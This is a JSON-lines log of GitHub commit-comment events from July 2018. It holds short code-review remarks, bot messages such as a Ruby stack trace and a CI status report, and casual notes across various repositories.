{"id":"8023205744","type":"CommitCommentEvent","actor":{"login":"TeriForey"},"repo":{"name":"TeriForey/planets"},"payload":{"comment":{"id":29845021,"position":null,"line":null,"path":null,"commit_id":"942f8e8e4c25a6d75d8946d62832246f3b5b7f6e","created_at":"2018-07-26T14:46:31Z","updated_at":"2018-07-26T14:46:31Z","author_association":"OWNER","body":"I don't think it is a planet..."}},"created_at":"2018-07-26T14:46:31Z"}
{"id":"8023221019","type":"CommitCommentEvent","actor":{"login":"arfogg"},"repo":{"name":"arfogg/planets"},"payload":{"comment":{"id":29845048,"position":null,"line":null,"path":null,"commit_id":"785a2bd38bc053fc2de51611ae347fee82a29870","created_at":"2018-07-26T14:48:43Z","updated_at":"2018-07-26T14:48:43Z","author_association":"OWNER","body":"hello this is a comment"}},"created_at":"2018-07-26T14:48:43Z"}
{"id":"8023242537","type":"CommitCommentEvent","actor":{"login":"passarom"},"repo":{"name":"CIRCSE/LEMLAT3"},"payload":{"comment":{"id":29845095,"position":null,"line":null,"path":null,"commit_id":"4442bbff50451d005fdb0ebf6451c8eec5adfc36","created_at":"2018-07-26T14:51:54Z","updated_at":"2018-07-26T14:51:54Z","author_association":"MEMBER","body":"Included changes due to Du Cange's addition."}},"created_at":"2018-07-26T14:51:54Z"}
{"id":"8023221511","type":"CommitCommentEvent","actor":{"login":"adabutch"},"repo":{"name":"City-of-Bloomington/drupal-theme-cob"},"payload":{"comment":{"id":29845049,"position":null,"line":null,"path":null,"commit_id":"e0b8f5f67531727534e4ec921276094ec9074f84","created_at":"2018-07-26T14:48:47Z","updated_at":"2018-07-26T14:48:47Z","author_association":"MEMBER","body":"CORRECTION: ref issue #128"}},"created_at":"2018-07-26T14:48:47Z"}
{"id":"8023232286","type":"CommitCommentEvent","actor":{"login":"Enchufa2"},"repo":{"name":"r-quantities/units"},"payload":{"comment":{"id":29845075,"position":null,"line":null,"path":null,"commit_id":"3c32401e0329a7436cc94871d0fca652bb500292","created_at":"2018-07-26T14:50:23Z","updated_at":"2018-07-26T14:50:23Z","author_association":"MEMBER","body":"This commit needs to be merged into master, which is broken since pillar v1.3.0, but I'm not sure if this branch is ready to be merged (maybe you intended to put this commit into master?)."}},"created_at":"2018-07-26T14:50:23Z"}
{"id":"8023224963","type":"CommitCommentEvent","actor":{"login":"ulf1"},"repo":{"name":"ulf1/oxyba"},"payload":{"comment":{"id":29845059,"position":null,"line":null,"path":null,"commit_id":"b51e4eb82ca9017c9e3240e1e9f5657dd529c2a4","created_at":"2018-07-26T14:49:19Z","updated_at":"2018-07-26T14:49:19Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [linreg_ols_pinv](https://trello.com/c/RnkT9FhZ/66-linregolspinv)"}},"created_at":"2018-07-26T14:49:19Z"}
{"id":"8023223792","type":"CommitCommentEvent","actor":{"login":"lzim"},"repo":{"name":"lzim/teampsd"},"payload":{"comment":{"id":29845056,"position":5,"line":32,"path":"model_workgroup/models/agg_v11_2018_06_25_lzedits.mdl","commit_id":"5eac487c334df15f0c160ae82b7a222cf92dc345","created_at":"2018-07-26T14:49:09Z","updated_at":"2018-07-26T14:49:09Z","author_association":"OWNER","body":"True, thanks for the clarification, Jane."}},"created_at":"2018-07-26T14:49:09Z"}
{"id":"8023223304","type":"CommitCommentEvent","actor":{"login":"MargheritaColucci"},"repo":{"name":"MargheritaColucci/planets"},"payload":{"comment":{"id":29845054,"position":null,"line":null,"path":null,"commit_id":"98df3fe5aff7a4742ef8108f2470df3f2cc2d528","created_at":"2018-07-26T14:49:04Z","updated_at":"2018-07-26T14:49:04Z","author_association":"OWNER","body":"cool!\r\n"}},"created_at":"2018-07-26T14:49:04Z"}
{"id":"8023225509","type":"CommitCommentEvent","actor":{"login":"arfogg"},"repo":{"name":"MargheritaColucci/planets"},"payload":{"comment":{"id":29845062,"position":null,"line":null,"path":null,"commit_id":"98df3fe5aff7a4742ef8108f2470df3f2cc2d528","created_at":"2018-07-26T14:49:24Z","updated_at":"2018-07-26T14:49:24Z","author_association":"COLLABORATOR","body":"hello"}},"created_at":"2018-07-26T14:49:24Z"}
{"id":"8023235317","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"teamed/qulice"},"payload":{"comment":{"id":29845081,"position":null,"line":null,"path":null,"commit_id":"6a3401327af029e7f50aa2b08af49730e1e37639","created_at":"2018-07-26T14:50:49Z","updated_at":"2018-07-26T14:50:49Z","author_association":"COLLABORATOR","body":"I wasn't able to retrieve PDD puzzles from the code base and submit them to GitHub. If you think that it's a bug on our side, please submit it to [yegor256/0pdd](https://github.com/yegor256/0pdd/issues):\n\n> execution expired\n\n\nPlease, copy and paste this stack trace to GitHub:\n\n\n```\nFaraday::ConnectionFailed\nexecution expired\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/net/http.rb:880:in `initialize'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/net/http.rb:880:in `open'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/net/http.rb:880:in `block in connect'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/timeout.rb:101:in `timeout'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/net/http.rb:878:in `connect'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/net/http.rb:863:in `do_start'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/net/http.rb:852:in `start'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/net/http.rb:1398:in `request'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/net/http.rb:1156:in `get'\n/app/vendor/bundle/ruby/2.3.0/gems/faraday-0.15.2/lib/faraday/adapter/net_http.rb:85:in `perform_request'\n/app/vendor/bundle/ruby/2.3.0/gems/faraday-0.15.2/lib/faraday/adapter/net_http.rb:43:in `block in call'\n/app/vendor/bundle/ruby/2.3.0/gems/faraday-0.15.2/lib/faraday/adapter/net_http.rb:92:in `with_net_http_connection'\n/app/vendor/bundle/ruby/2.3.0/gems/faraday-0.15.2/lib/faraday/adapter/net_http.rb:38:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/faraday-0.15.2/lib/faraday/response.rb:8:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/faraday-0.15.2/lib/faraday/response.rb:8:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/octokit-4.9.0/lib/octokit/middleware/follow_redirects.rb:73:in `perform_with_redirection'\n/app/vendor/bundle/ruby/2.3.0/gems/octokit-4.9.0/lib/octokit/middleware/follow_redirects.rb:61:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/faraday-0.15.2/lib/faraday/rack_builder.rb:143:in `build_response'\n/app/vendor/bundle/ruby/2.3.0/gems/faraday-0.15.2/lib/faraday/connection.rb:387:in `run_request'\n/app/vendor/bundle/ruby/2.3.0/gems/faraday-0.15.2/lib/faraday/connection.rb:138:in `get'\n/app/vendor/bundle/ruby/2.3.0/gems/sawyer-0.8.1/lib/sawyer/agent.rb:94:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/octokit-4.9.0/lib/octokit/connection.rb:156:in `request'\n/app/vendor/bundle/ruby/2.3.0/gems/octokit-4.9.0/lib/octokit/connection.rb:19:in `get'\n/app/vendor/bundle/ruby/2.3.0/gems/octokit-4.9.0/lib/octokit/client/issues.rb:114:in `issue'\n/app/objects/github_tickets.rb:61:in `close'\n/app/objects/logged_tickets.rb:61:in `close'\n/app/objects/github_tagged_tickets.rb:77:in `close'\n/app/objects/commit_tickets.rb:54:in `close'\n/app/objects/emailed_tickets.rb:63:in `close'\n/app/objects/sentry_tickets.rb:56:in `close'\n/app/objects/puzzles.rb:76:in `block in expose'\n/app/objects/puzzles.rb:68:in `loop'\n/app/objects/puzzles.rb:68:in `expose'\n/app/objects/puzzles.rb:33:in `deploy'\n/app/objects/job.rb:38:in `proceed'\n/app/objects/job_starred.rb:33:in `proceed'\n/app/objects/job_recorded.rb:32:in `proceed'\n/app/objects/job_emailed.rb:35:in `proceed'\n/app/objects/job_commiterrors.rb:36:in `proceed'\n/app/objects/job_detached.rb:48:in `exclusive'\n/app/objects/job_detached.rb:36:in `block in proceed'\n/app/objects/job_detached.rb:36:in `fork'\n/app/objects/job_detached.rb:36:in `proceed'\n/app/0pdd.rb:342:in `block in <top (required)>'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1634:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1634:in `block in compile!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:992:in `block (3 levels) in route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1011:in `route_eval'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:992:in `block (2 levels) in route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1039:in `block in process_route'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1037:in `catch'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1037:in `process_route'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:990:in `block in route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:989:in `each'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:989:in `route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1096:in `block in dispatch!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `block in invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `catch'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1093:in `dispatch!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:924:in `block in call!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `block in invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `catch'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:924:in `call!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:913:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/xss_header.rb:18:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/path_traversal.rb:16:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/json_csrf.rb:26:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/base.rb:50:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/base.rb:50:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/frame_options.rb:31:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/logger.rb:15:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/common_logger.rb:33:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:231:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:224:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/head.rb:12:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/method_override.rb:22:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:194:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1957:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1501:in `block in call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1728:in `synchronize'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1501:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/handler/webrick.rb:86:in `service'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/webrick/httpserver.rb:140:in `service'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/webrick/httpserver.rb:96:in `run'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/webrick/server.rb:296:in `block in start_thread'\n```"}},"created_at":"2018-07-26T14:50:49Z"}
{"id":"8023252879","type":"CommitCommentEvent","actor":{"login":"coolo"},"repo":{"name":"coolo/open-build-service"},"payload":{"comment":{"id":29845126,"position":null,"line":null,"path":null,"commit_id":"f2016a5f3720e8ce54115df5f433017a08189148","created_at":"2018-07-26T14:53:29Z","updated_at":"2018-07-26T14:53:29Z","author_association":"OWNER","body":"bundle exec clockworkd would do it - but it requires running it from the rails root"}},"created_at":"2018-07-26T14:53:29Z"}
{"id":"8023254414","type":"CommitCommentEvent","actor":{"login":"mateusps10"},"repo":{"name":"mateusps10/POO_Python"},"payload":{"comment":{"id":29845129,"position":null,"line":null,"path":null,"commit_id":"77a863649ed7068e7b3c482b67953b46188c349b","created_at":"2018-07-26T14:53:42Z","updated_at":"2018-07-26T14:53:42Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [POO Python](https://trello.com/c/2y1MUYok/36-poo-python)"}},"created_at":"2018-07-26T14:53:42Z"}
{"id":"8023256938","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29845135,"position":null,"line":null,"path":null,"commit_id":"15183b39c052da06bfd6ecae742e832f520324a5","created_at":"2018-07-26T14:54:08Z","updated_at":"2018-07-26T14:54:08Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-26T14:54:08Z"}
{"id":"8023223523","type":"CommitCommentEvent","actor":{"login":"amosbird"},"repo":{"name":"yandex/ClickHouse"},"payload":{"comment":{"id":29845055,"position":null,"line":null,"path":null,"commit_id":"ec202a7fd0531af8850e307951b97f4642ec1c86","created_at":"2018-07-26T14:49:06Z","updated_at":"2018-07-26T14:49:06Z","author_association":"CONTRIBUTOR","body":"Should use `cluster.shutdown(False)` or else the host's `/etc/resolv.conf` won't be reset back."}},"created_at":"2018-07-26T14:49:06Z"}
{"id":"8023260130","type":"CommitCommentEvent","actor":{"login":"telemetrik"},"repo":{"name":"zyczynski/sklep"},"payload":{"comment":{"id":29845140,"position":17,"line":11,"path":"index.php","commit_id":"a1ba977f9df0b2c0028e3be88fbfd5799cb3cffd","created_at":"2018-07-26T14:54:36Z","updated_at":"2018-07-26T14:54:36Z","author_association":"COLLABORATOR","body":"Czemu podajesz ceny jako string a nie integer?"}},"created_at":"2018-07-26T14:54:36Z"}
{"id":"8023260264","type":"CommitCommentEvent","actor":{"login":"damianoneill"},"repo":{"name":"damianoneill/nc-hammer"},"payload":{"comment":{"id":29845141,"position":null,"line":null,"path":null,"commit_id":"c524f67805cce36a56d825b90a706acd04b5b887","created_at":"2018-07-26T14:54:38Z","updated_at":"2018-07-26T14:54:38Z","author_association":"OWNER","body":"#15 "}},"created_at":"2018-07-26T14:54:38Z"}
{"id":"8023263285","type":"CommitCommentEvent","actor":{"login":"telemetrik"},"repo":{"name":"zyczynski/sklep"},"payload":{"comment":{"id":29845144,"position":21,"line":14,"path":"index.php","commit_id":"a1ba977f9df0b2c0028e3be88fbfd5799cb3cffd","created_at":"2018-07-26T14:55:06Z","updated_at":"2018-07-26T14:55:06Z","author_association":"COLLABORATOR","body":"Jeżeli klucz Ci niepotrzebny to go wywal."}},"created_at":"2018-07-26T14:55:06Z"}
{"id":"8023263321","type":"CommitCommentEvent","actor":{"login":"esenav"},"repo":{"name":"esenav/Barclays"},"payload":{"comment":{"id":29845145,"position":null,"line":null,"path":null,"commit_id":"7872da87511059a1521ec3df6de425f949123b38","created_at":"2018-07-26T14:55:06Z","updated_at":"2018-07-26T14:55:06Z","author_association":"OWNER","body":"More advanced version than Solution 1"}},"created_at":"2018-07-26T14:55:06Z"}
{"id":"8023264734","type":"CommitCommentEvent","actor":{"login":"katulistiwa"},"repo":{"name":"glasklart/hd"},"payload":{"comment":{"id":29845153,"position":null,"line":null,"path":null,"commit_id":"652132f18c8961233484a4cab13ff8c66a18f05d","created_at":"2018-07-26T14:55:19Z","updated_at":"2018-07-26T14:55:19Z","author_association":"NONE","body":"The big projecr"}},"created_at":"2018-07-26T14:55:19Z"}
{"id":"8023265397","type":"CommitCommentEvent","actor":{"login":"florinionce"},"repo":{"name":"PopaFlorian/Assigment1"},"payload":{"comment":{"id":29845155,"position":2,"line":2,"path":"Index.css","commit_id":"3374cd278b48d815de9462ffe6947dbf0aee840e","created_at":"2018-07-26T14:55:25Z","updated_at":"2018-07-26T14:55:25Z","author_association":"NONE","body":"add space after `:`"}},"created_at":"2018-07-26T14:55:25Z"}
{"id":"8023266156","type":"CommitCommentEvent","actor":{"login":"florinionce"},"repo":{"name":"PopaFlorian/Assigment1"},"payload":{"comment":{"id":29845157,"position":6,"line":6,"path":"Index.css","commit_id":"3374cd278b48d815de9462ffe6947dbf0aee840e","created_at":"2018-07-26T14:55:32Z","updated_at":"2018-07-26T14:55:32Z","author_association":"NONE","body":"remove one extra line"}},"created_at":"2018-07-26T14:55:32Z"}
{"id":"8023267639","type":"CommitCommentEvent","actor":{"login":"florinionce"},"repo":{"name":"PopaFlorian/Assigment1"},"payload":{"comment":{"id":29845163,"position":11,"line":11,"path":"Index.css","commit_id":"3374cd278b48d815de9462ffe6947dbf0aee840e","created_at":"2018-07-26T14:55:46Z","updated_at":"2018-07-26T14:55:46Z","author_association":"NONE","body":"move `top.jpg` in the images folder"}},"created_at":"2018-07-26T14:55:46Z"}
{"id":"8023268750","type":"CommitCommentEvent","actor":{"login":"florinionce"},"repo":{"name":"PopaFlorian/Assigment1"},"payload":{"comment":{"id":29845165,"position":12,"line":12,"path":"Index.css","commit_id":"3374cd278b48d815de9462ffe6947dbf0aee840e","created_at":"2018-07-26T14:55:55Z","updated_at":"2018-07-26T14:55:55Z","author_association":"NONE","body":"add space after `:`"}},"created_at":"2018-07-26T14:55:55Z"}
{"id":"8023272620","type":"CommitCommentEvent","actor":{"login":"florinionce"},"repo":{"name":"PopaFlorian/Assigment1"},"payload":{"comment":{"id":29845171,"position":15,"line":15,"path":"Index.css","commit_id":"3374cd278b48d815de9462ffe6947dbf0aee840e","created_at":"2018-07-26T14:56:29Z","updated_at":"2018-07-26T14:56:29Z","author_association":"NONE","body":"remove extra lines"}},"created_at":"2018-07-26T14:56:29Z"}
{"id":"8023273429","type":"CommitCommentEvent","actor":{"login":"camillebernard"},"repo":{"name":"camillebernard/tsn"},"payload":{"comment":{"id":29845174,"position":null,"line":null,"path":null,"commit_id":"22a9c8f4175b7903dffdc03e937b7210971625a9","created_at":"2018-07-26T14:56:36Z","updated_at":"2018-07-26T14:56:36Z","author_association":"OWNER","body":"minor modif on the description of the Class TSNFeature. "}},"created_at":"2018-07-26T14:56:36Z"}
{"id":"8023274385","type":"CommitCommentEvent","actor":{"login":"davestewart"},"repo":{"name":"davestewart/vuex-pathify"},"payload":{"comment":{"id":29845176,"position":null,"line":null,"path":null,"commit_id":"03079f458afda39a3524816b3f785ae05c9c1762","created_at":"2018-07-26T14:56:45Z","updated_at":"2018-07-26T14:56:45Z","author_association":"OWNER","body":"Ah, let me check."}},"created_at":"2018-07-26T14:56:45Z"}
{"id":"8023274423","type":"CommitCommentEvent","actor":{"login":"florinionce"},"repo":{"name":"PopaFlorian/Assigment1"},"payload":{"comment":{"id":29845177,"position":39,"line":39,"path":"Index.css","commit_id":"3374cd278b48d815de9462ffe6947dbf0aee840e","created_at":"2018-07-26T14:56:45Z","updated_at":"2018-07-26T14:56:45Z","author_association":"NONE","body":"remove extra line"}},"created_at":"2018-07-26T14:56:45Z"}
{"id":"8023274557","type":"CommitCommentEvent","actor":{"login":"waddlesplash"},"repo":{"name":"haikuports/haikuports"},"payload":{"comment":{"id":29845178,"position":null,"line":null,"path":null,"commit_id":"b52dff5267a144de293c9c06f7b0102ee22258b4","created_at":"2018-07-26T14:56:46Z","updated_at":"2018-07-26T14:56:46Z","author_association":"MEMBER","body":"@Begasus, if you could take a look, that would be good."}},"created_at":"2018-07-26T14:56:46Z"}
{"id":"8023276522","type":"CommitCommentEvent","actor":{"login":"florinionce"},"repo":{"name":"PopaFlorian/Assigment1"},"payload":{"comment":{"id":29845182,"position":52,"line":52,"path":"Index.css","commit_id":"3374cd278b48d815de9462ffe6947dbf0aee840e","created_at":"2018-07-26T14:57:03Z","updated_at":"2018-07-26T14:57:03Z","author_association":"NONE","body":"remove extra line"}},"created_at":"2018-07-26T14:57:03Z"}
{"id":"8023276702","type":"CommitCommentEvent","actor":{"login":"telemetrik"},"repo":{"name":"zyczynski/sklep"},"payload":{"comment":{"id":29845183,"position":21,"line":14,"path":"index.php","commit_id":"a1ba977f9df0b2c0028e3be88fbfd5799cb3cffd","created_at":"2018-07-26T14:57:04Z","updated_at":"2018-07-26T14:57:04Z","author_association":"COLLABORATOR","body":"Nie byłoby lepiej jakbyś zamiast `$wartosc` mial `$produkt` ?  \r\n`$wartosc->getNazwa()` == daj mi nazwę wartości, czymkolwiek ona jest (przewinę do góry żeby zobaczyć co to w ogóle było)\r\n`$produkt->getNazwa()` == daj mi nazwę produktu"}},"created_at":"2018-07-26T14:57:04Z"}
{"id":"8023279967","type":"CommitCommentEvent","actor":{"login":"discoursebot"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29845192,"position":null,"line":null,"path":null,"commit_id":"467c5299207636b2d9f966885c81d8b167283103","created_at":"2018-07-26T14:57:33Z","updated_at":"2018-07-26T14:57:33Z","author_association":"NONE","body":"This commit has been mentioned on **Discourse Meta**. There might be relevant details there:\n\nhttps://meta.discourse.org/t/localjumperror-unexpected-return-var-www-discourse-lib-plugin-instance-rb-188-when-loading-any-topic/93216/7\n"}},"created_at":"2018-07-26T14:57:33Z"}
{"id":"8023280227","type":"CommitCommentEvent","actor":{"login":"florinionce"},"repo":{"name":"PopaFlorian/Assigment1"},"payload":{"comment":{"id":29845193,"position":69,"line":69,"path":"Index.css","commit_id":"3374cd278b48d815de9462ffe6947dbf0aee840e","created_at":"2018-07-26T14:57:36Z","updated_at":"2018-07-26T14:57:36Z","author_association":"NONE","body":"add space "}},"created_at":"2018-07-26T14:57:36Z"}
{"id":"8023285925","type":"CommitCommentEvent","actor":{"login":"sprunk"},"repo":{"name":"ZeroK-RTS/Zero-K"},"payload":{"comment":{"id":29845211,"position":81,"line":147,"path":"LuaUI/Widgets/cmd_missile_silo.lua","commit_id":"ddf44ec195fbd93496eb9da736382ca487c282dd","created_at":"2018-07-26T14:58:27Z","updated_at":"2018-07-26T14:58:27Z","author_association":"MEMBER","body":"Why not have this in `CommandNotify`? That way we won't need to poll in `Update`, won't be delayed by ping, and there won't be the possibility of stacking the command in case two instances are processed in one update."}},"created_at":"2018-07-26T14:58:27Z"}
{"id":"8023286655","type":"CommitCommentEvent","actor":{"login":"Rideress"},"repo":{"name":"Rideress/JavaLearning"},"payload":{"comment":{"id":29845214,"position":12,"line":9,"path":"src/main/java/HelloWorld/HelloWorld.java","commit_id":"e4ccc36ef4e7f4a4c065e27072189641f9ac2e0c","created_at":"2018-07-26T14:58:34Z","updated_at":"2018-07-26T14:58:34Z","author_association":"OWNER","body":"Ну у нас же должен быть доступ к myPrintln()  в строке MySystem.myOut.myPrintln(\"Hello World\"); или мы должны сделать этот доступ через myOut ?\r\nПросто если у нас myPrintln() будет лежать в MySystem то тогда мы сможем вызвать и без myOut, отсюда я не понимаю для чего мы инициализируем myOut, изначально я полагаю Out нужен был чтобы отличать его от in, в данной же программе мы просто реализуем ту же самую команду только инициализируя через свои классы, поля и методы."}},"created_at":"2018-07-26T14:58:34Z"}
{"id":"8023291276","type":"CommitCommentEvent","actor":{"login":"florinionce"},"repo":{"name":"PopaFlorian/Assigment1"},"payload":{"comment":{"id":29845236,"position":40,"line":40,"path":"Index.html","commit_id":"3374cd278b48d815de9462ffe6947dbf0aee840e","created_at":"2018-07-26T14:59:13Z","updated_at":"2018-07-26T14:59:13Z","author_association":"NONE","body":"typo - should be `class`"}},"created_at":"2018-07-26T14:59:13Z"}
{"id":"8023295276","type":"CommitCommentEvent","actor":{"login":"florinionce"},"repo":{"name":"PopaFlorian/Assigment1"},"payload":{"comment":{"id":29845248,"position":56,"line":56,"path":"Index.html","commit_id":"3374cd278b48d815de9462ffe6947dbf0aee840e","created_at":"2018-07-26T14:59:48Z","updated_at":"2018-07-26T14:59:48Z","author_association":"NONE","body":"rename `showMenuAfter` to `resetMenu`"}},"created_at":"2018-07-26T14:59:48Z"}
{"id":"8023283756","type":"CommitCommentEvent","actor":{"login":"florinionce"},"repo":{"name":"PopaFlorian/Assigment1"},"payload":{"comment":{"id":29845202,"position":14,"line":14,"path":"Index.html","commit_id":"3374cd278b48d815de9462ffe6947dbf0aee840e","created_at":"2018-07-26T14:58:08Z","updated_at":"2018-07-26T14:58:08Z","author_association":"NONE","body":"rename to `index.js`"}},"created_at":"2018-07-26T14:58:08Z"}
{"id":"8023293184","type":"CommitCommentEvent","actor":{"login":"slobns"},"repo":{"name":"slobns/social-network-laravel"},"payload":{"comment":{"id":29845239,"position":4,"line":53,"path":"config/database.php","commit_id":"028698faa62e0b81b708c8c7de008fd6cc5a91d3","created_at":"2018-07-26T14:59:30Z","updated_at":"2018-07-26T14:59:30Z","author_association":"OWNER","body":"Add Friend button does not work until setup 'strict' => false"}},"created_at":"2018-07-26T14:59:30Z"}
{"id":"8023289170","type":"CommitCommentEvent","actor":{"login":"florinionce"},"repo":{"name":"PopaFlorian/Assigment1"},"payload":{"comment":{"id":29845225,"position":40,"line":40,"path":"Index.html","commit_id":"3374cd278b48d815de9462ffe6947dbf0aee840e","created_at":"2018-07-26T14:58:56Z","updated_at":"2018-07-26T14:58:56Z","author_association":"NONE","body":"align from css"}},"created_at":"2018-07-26T14:58:56Z"}
{"id":"8023288482","type":"CommitCommentEvent","actor":{"login":"florinionce"},"repo":{"name":"PopaFlorian/Assigment1"},"payload":{"comment":{"id":29845223,"position":42,"line":42,"path":"Index.html","commit_id":"3374cd278b48d815de9462ffe6947dbf0aee840e","created_at":"2018-07-26T14:58:50Z","updated_at":"2018-07-26T14:58:50Z","author_association":"NONE","body":"the code is not indented correct"}},"created_at":"2018-07-26T14:58:50Z"}
{"id":"8023302404","type":"CommitCommentEvent","actor":{"login":"florinionce"},"repo":{"name":"PopaFlorian/Assigment1"},"payload":{"comment":{"id":29845268,"position":94,"line":94,"path":"Index.html","commit_id":"3374cd278b48d815de9462ffe6947dbf0aee840e","created_at":"2018-07-26T15:00:47Z","updated_at":"2018-07-26T15:00:47Z","author_association":"NONE","body":"I would use a better name instead of first - `menu-items-wrapper`"}},"created_at":"2018-07-26T15:00:47Z"}
{"id":"8023304520","type":"CommitCommentEvent","actor":{"login":"robertpytel"},"repo":{"name":"robertpytel/Python-A-Feed-Your-Pet-Sim"},"payload":{"comment":{"id":29845273,"position":null,"line":null,"path":null,"commit_id":"bea750058db9b03c565d7bd950f78907fe0a127d","created_at":"2018-07-26T15:01:06Z","updated_at":"2018-07-26T15:01:06Z","author_association":"OWNER","body":"Pet Simulator"}},"created_at":"2018-07-26T15:01:06Z"}
{"id":"8023305062","type":"CommitCommentEvent","actor":{"login":"florinionce"},"repo":{"name":"PopaFlorian/Assigment1"},"payload":{"comment":{"id":29845275,"position":14,"line":14,"path":"Index.js","commit_id":"3374cd278b48d815de9462ffe6947dbf0aee840e","created_at":"2018-07-26T15:01:11Z","updated_at":"2018-07-26T15:01:11Z","author_association":"NONE","body":"remove spaces between each object"}},"created_at":"2018-07-26T15:01:11Z"}
